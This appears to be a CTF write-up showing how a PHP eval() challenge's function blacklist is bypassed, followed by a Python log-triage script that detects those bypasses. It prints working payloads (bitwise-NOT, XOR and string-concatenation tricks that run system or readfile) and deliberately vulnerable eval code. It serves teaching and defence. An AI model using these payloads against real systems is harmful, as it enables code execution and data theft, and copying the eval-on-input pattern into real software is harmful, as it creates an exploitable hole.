A few days ago I got hold of the source of a challenge from an online CTF, together with the official solution. It is a textbook case of bypassing a function blacklist in front of eval().
First, look at the challenge code:
```php
<?php
highlight_file(__FILE__);
error_reporting(0);
$blacklist = ["system", "ini_set", "exec", "scandir", "shell_exec", "proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"];
// Every built-in (internal) PHP function name is appended to the list as well
$blacklist = array_merge($blacklist, get_defined_functions()['internal']);
foreach ($blacklist as $i) {
    // Case-insensitive substring match against the raw cmd parameter only
    if (stristr($_GET[cmd], $i) !== false) {
        die('hack');
    }
}
eval($_GET[cmd]);
?>
```
As you can see, every built-in function plus a set of sensitive names is on the blacklist. There are two ways to solve the challenge:
1. Bitwise NOT / XOR bypass
The flag is known to be in flag.php, so that file is read directly. Payload using bitwise NOT:
```text
(~%8D%9A%9E%9B%99%96%93%9A)((~%99%93%9E%98%D1%8F%97%8F));
```
Sending this request returns the source of flag.php, which contains the flag:
Likewise, XOR can be used to read the file contents. Payload:
```text
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}("flag.php");&%ff=readfile
```
2. String concatenation bypass
This is the solution given in the organizers' slides: the command string is assembled by concatenation, assigned to a variable, and then executed.
The first payload concatenates the function name:
```text
$a='sys'.'tem';$a("cat flag.php");
```
The second payload concatenates a whole statement and evaluates it:
```text
$a="syste";$b="m(%27cat%20flag.php%27);";$c=$a.$b;eval($c);
```
The principle is the same, so I will not go into detail here. Corrections are welcome!
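All three payloads share one property: the blacklisted name never appears literally in cmd. It is built at runtime by ~ (bitwise NOT of each byte), by ^ (XOR, with the real name travelling in a second parameter the check never reads), or by string concatenation. The stristr() loop inspects only the bytes of cmd for known names, so a check that wants to notice these requests has to look at how the input is constructed rather than which names it contains. The following Python is an added example, not code from the post or from the challenge: it parses constructed access-log lines (assumed to be in the usual combined log format) whose cmd values mirror the three payload shapes above, replays the challenge's substring check to show it does not fire, and then applies byte-level indicators that do. The decode_bitwise_not helper is an analyst aid for reading back a ~-encoded name during triage.

```python
import re
from urllib.parse import unquote_to_bytes

# Subset of the challenge's blacklist; the real one also merges every internal PHP function name.
BLACKLIST = [b"system", b"exec", b"readfile", b"file_get_contents", b"popen", b"fopen", b"file", b"echo"]

# Constructed access-log lines (not from the page). Line 0 is benign; lines 1-3 carry the
# three payload shapes from the writeup, URL-encoded the way a web server would log them.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/May/2020:10:00:00 +0000] "GET /index.php?cmd=%24x%3D1%2B1%3B HTTP/1.1" 200 128',
    '10.0.0.5 - - [01/May/2020:10:00:01 +0000] "GET /index.php?cmd=(~%8D%9A%9E%9B%99%96%93%9A)((~%99%93%9E%98%D1%8F%97%8F)); HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/May/2020:10:00:02 +0000] "GET /index.php?cmd=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}(%22flag.php%22);&%ff=readfile HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/May/2020:10:00:03 +0000] "GET /index.php?cmd=$a=%27sys%27.%27tem%27;$a(%22cat%20flag.php%22); HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def parse_query(log_line: str) -> dict:
    """Return the request's query parameters as raw bytes, the way PHP's $_GET sees them."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return {}
    _, _, query = m.group(1).partition("?")
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_to_bytes(key)] = unquote_to_bytes(value.replace("+", " "))
    return params


def stristr_hits(value: bytes) -> list:
    """Mimic the challenge's check: case-insensitive substring match of each blacklisted name."""
    lowered = value.lower()
    return [name.decode() for name in BLACKLIST if name in lowered]


# Byte-level indicators that survive name obfuscation: they look at how the input is built, not at names.
INDICATORS = {
    "high_bytes": lambda c: any(b >= 0x80 for b in c),                                      # ~ and ^ on strings yield non-ASCII bytes
    "bitwise_string_op": lambda c: b"~" in c or b"^" in c,                                  # operators that build names at runtime
    "variable_function_call": lambda c: re.search(rb"\$\w*\s*\(|\}\s*\(", c) is not None,  # $a(...), ${...}{...}(...)
    "string_concat_call": lambda c: re.search(rb"['\"]\s*\.\s*['\"]", c) is not None,      # 'sys'.'tem'
}


def decode_bitwise_not(segment: bytes) -> bytes:
    """Analyst helper: undo PHP's ~ on a string (bitwise NOT of every byte)."""
    return bytes(b ^ 0xFF for b in segment)


def triage(log_line: str) -> dict:
    """Compare what the original check sees with what the byte-level indicators see."""
    params = parse_query(log_line)
    cmd = params.get(b"cmd", b"")
    # The blacklisted name may arrive in a parameter the original check never reads (the %ff trick).
    other_hits = sorted({h for k, v in params.items() if k != b"cmd" for h in stristr_hits(v)})
    return {
        "cmd": cmd,
        "blacklist_hits": stristr_hits(cmd),
        "indicators": [name for name, check in INDICATORS.items() if check(cmd)],
        "names_in_other_params": other_hits,
    }


def suspicious_lines(lines) -> list:
    """Indexes of the log lines that the byte-level indicators flag."""
    return [i for i, line in enumerate(lines) if triage(line)["indicators"]]


if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_LOG):
        t = triage(line)
        print(i, t["blacklist_hits"], t["indicators"], t["names_in_other_params"])
```

Running it shows the substring check returning no hits on any of the three payload lines, while each of them trips at least one indicator: the NOT payload on high bytes and the ~ operator, the XOR payload on those plus the `}(` call shape (with "readfile" showing up in the second parameter the check ignores), and the concatenation payload on the `'.'` join and the `$a(` variable-function call. The indicators are heuristics for log review and WAF rules; the actual fix for this code is to stop passing user input to eval() at all.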